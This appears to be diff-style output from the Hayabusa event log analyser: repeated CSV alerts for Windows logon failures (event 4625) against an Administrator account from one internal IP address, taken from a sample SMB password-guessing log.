+2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
